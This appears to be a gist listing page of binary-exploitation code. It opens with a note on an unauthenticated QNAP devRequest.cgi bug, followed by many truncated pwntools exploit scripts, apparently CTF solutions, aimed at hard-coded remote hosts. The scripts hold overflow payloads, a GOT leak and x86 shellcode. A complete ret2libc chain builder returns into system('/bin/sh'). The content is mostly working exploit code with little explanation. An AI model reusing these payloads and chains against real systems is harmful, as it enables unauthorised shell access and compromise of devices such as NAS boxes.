This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
I recently noticed a bug in QNAP. This bug has been patched in the latest patch (I did not report it). My environment was a TS-210, and the vulnerability was in devRequest.cgi.
And this bug does not require authentication by default.

```c
/* Decompiler output from devRequest.cgi (gist preview, truncated) */
v0 = CGI_Get_Input();
dword_27FEC = v0;
v1 = CGI_Find_Parameter(v0, "todo");
if ( v1 && !strcmp(*(const char **)(v1 + 4), "get_keyfile") && (v2 = CGI_Find_Parameter(dword_27FEC, "password")) != 0 )
{
    /* ... remainder of the handler is not shown in the gist preview ... */
}
```
```python
# Python 2 / pwntools exploit script (gist preview, truncated)
from pwn import *
from hexdump import *

# p = process("./ohmybof")
p = remote("223.194.105.182", 41001)

def main():
    popret = 0x80482ad     # pop; ret gadget used to clean one argument off the stack
    wr = 0x080483E3        # address of write() in the binary
    payload = "A" * 24     # padding up to the saved return address
    # ... remainder of the exploit is not shown in the gist preview
```
```python
# Python 2 / pwntools exploit script (gist preview, truncated)
from pwn import *

r = remote('223.194.105.182', 29001)

def main():
    payload = 'A' * 204            # padding up to the first overwritten slot
    payload += p32(0x20f31)        # value written at offset 204
    payload += 'A' * 192           # padding up to the saved return address
    payload += p32(0x80485bd)      # return address
    payload += p32(0x8048980)      # next stack slot (return address for the call above)
    # ... remainder of the exploit is not shown in the gist preview
```
```python
# Python 2 / pwntools exploit script (gist preview, truncated)
from pwn import *

r = remote("223.194.105.182", 22901)

def main():
    payload = "A" * 0x1c           # 28 bytes of padding up to the saved frame pointer
    payload += "BBBB"              # overwrites the saved ebp
    payload += p32(0x080487F9)     # return address
    r.send(payload)
    # ... remainder of the exploit is not shown in the gist preview
```
```python
# Python 2 / pwntools exploit script (gist preview, truncated)
from pwn import *
from hexdump import *

r = remote("223.194.105.182", 22900)

def main():
    # Self-decoding x86 shellcode (fnstenv-based GetPC followed by a decode loop).
    # Only the first 56 bytes are visible in the gist preview.
    shellcode = ("\xda\xd4\xba\x11\xf2\x16\x5f\xd9\x74\x24\xf4\x5e\x33\xc9" +
                 "\xb1\x0d\x31\x56\x18\x03\x56\x18\x83\xee\xed\x10\xe3\x35" +
                 "\x06\x8d\x95\x98\x7e\x45\x8b\x7f\xf7\x72\xbb\x50\x74\x15" +
                 "\x3c\xc7\x55\x87\x55\x79\x20\xa4\xf4\x6d\x3c\x2b\xf9\x6d")
    # ... remainder of the shellcode and of the exploit are not shown in the gist preview
```
```python
# Python 2 / pwntools exploit script (gist preview, truncated)
from pwn import *
from hexdump import *

# p = process("./attackme")
p = remote("223.194.105.182", 37100)
libc = ELF("./libc-2.23.so")     # target libc, used to compute symbol offsets from a leak

def main():
    read = 0x080483B0            # read@plt
    read_got = 0x804A00C         # read@got.plt: leaking this slot reveals read()'s libc address
    # ... remainder of the exploit is not shown in the gist preview
```
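The attackme gist sets up the classic x86 ret2libc flow (read@plt, read@got and the target's libc-2.23), and the ohmybof gist shows the other half of it (a pop;ret gadget and the address of write). The block below is an added example, not code from any of these gists: it models the two stages offline with struct instead of pwntools. Stage 1 returns into write() to print the GOT slot of read() and then returns to main for a second overflow; stage 2 turns the leak into the libc base and returns into system("/bin/sh"). The padding length, every binary address, the gadget and the libc offsets are assumed values chosen for illustration; in a real exploit they come from the target binary and from ELF("./libc-2.23.so").symbols.

```python
import struct

# Added example (not code from the gists on this page): offline model of a
# two-stage x86 ret2libc exploit. All addresses and offsets are constructed.

PADDING   = 24            # assumed distance from the buffer start to the saved return address
WRITE_PLT = 0x080483e0    # assumed write@plt
MAIN_ADDR = 0x08048520    # assumed address of main(), executed again after the leak
READ_GOT  = 0x0804a00c    # assumed read@got.plt (the GOT slot that gets leaked)
POP3_RET  = 0x080482ad    # assumed "pop ebx; pop esi; pop edi; ret" gadget

# Assumed libc-2.23 symbol offsets; read the real ones from the target libc,
# e.g. ELF("./libc-2.23.so").symbols["read"] and .search("/bin/sh").
LIBC_OFF = {
    "read": 0x0d5a30,
    "system": 0x03a940,
    "/bin/sh": 0x15902b,
}


def p32(value):
    """Pack a 32-bit little-endian value (what pwntools' p32 does)."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def u32(data):
    """Unpack the first four bytes as a little-endian 32-bit value."""
    return struct.unpack("<I", bytes(data[:4]))[0]


def stage1_leak_chain():
    """Overflow -> write(1, READ_GOT, 4) -> pop3;ret -> main.

    write@plt is entered by returning into it, so the next stack slot is the
    address write() returns to. Putting a pop;pop;pop;ret gadget there pops the
    three arguments so execution lands cleanly in main for a second overflow.
    """
    chain = b"A" * PADDING
    chain += p32(WRITE_PLT)
    chain += p32(POP3_RET)
    chain += p32(1) + p32(READ_GOT) + p32(4)   # fd, buf, count
    chain += p32(MAIN_ADDR)
    return chain


def libc_base_from_leak(leaked_read):
    """Turn the leaked address of read() into the libc load address."""
    base = leaked_read - LIBC_OFF["read"]
    if base & 0xFFF:
        raise ValueError("libc base 0x%x is not page aligned: wrong offset or bad leak" % base)
    return base


def stage2_system_chain(libc_base):
    """Overflow -> system("/bin/sh"); the slot after system is its return address."""
    chain = b"A" * PADDING
    chain += p32(libc_base + LIBC_OFF["system"])
    chain += p32(0xdeadbeef)                      # return address for system(), never used
    chain += p32(libc_base + LIBC_OFF["/bin/sh"])
    return chain


def simulate(libc_base=0xF7E00000):
    """Offline run: fake the 4-byte leak the target would write back, then build stage 2."""
    leaked = p32(libc_base + LIBC_OFF["read"])    # what write(1, READ_GOT, 4) would emit
    base = libc_base_from_leak(u32(leaked))
    return base, stage2_system_chain(base)


if __name__ == "__main__":
    print("stage 1: %d bytes" % len(stage1_leak_chain()))
    base, chain = simulate()
    print("libc base 0x%08x, stage 2: %d bytes" % (base, len(chain)))
```

The page-alignment check in libc_base_from_leak is the first thing to look at when a ret2libc chain crashes: a base that is not a multiple of 0x1000 means the offset was taken from the wrong libc build or the leak was read from the wrong position in the output.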
```python
# Python 2 / pwntools exploit script (gist preview, truncated)
from pwn import *
from hexdump import *
import time

p = process("./messenger")
# p = remote("110.10.212.137", 3334)

def leave(size, data):
    """Select the 'L' (leave) menu entry; the size and data prompts follow."""
    p.sendline("L")
    time.sleep(0.1)
    # ... remainder of the menu interaction is not shown in the gist preview
```
```python
# Python 2 / pwntools exploit script (gist preview, truncated)
from pwn import *
from hexdump import *
import time

# r = remote("localhost", 8889)
r = remote("110.10.212.130", 8889)

def echo(data):
    """Select menu entry 1 (echo); the data prompt follows."""
    r.sendline("1")
    time.sleep(0.1)
    # ... remainder of the menu interaction is not shown in the gist preview
```
```python
# Python 2 / pwntools exploit script (gist preview, truncated)
from pwn import *
from time import *
from hexdump import *

p = process("./solo")

def malloc(idx, size, data):
    """Select menu entry 1 (allocate) and send the slot index; size and data follow."""
    p.sendline("1")
    p.sendline(idx)
    # ... remainder of the menu interaction is not shown in the gist preview
```
```python
# Python 2 / pwntools exploit script (gist preview, truncated)
from pwn import *

# p = process("./ez_heap")
p = remote("52.199.49.117", 10003)

def getHeaptr():
    """Read one line from the service and parse it as a hex heap address."""
    buf = p.recvline()
    heaptr = int(buf[:-1], 16)      # strip the trailing newline before parsing
    log.info("heap: " + hex(heaptr))
    return heaptr
    # ... remainder of the exploit is not shown in the gist preview
```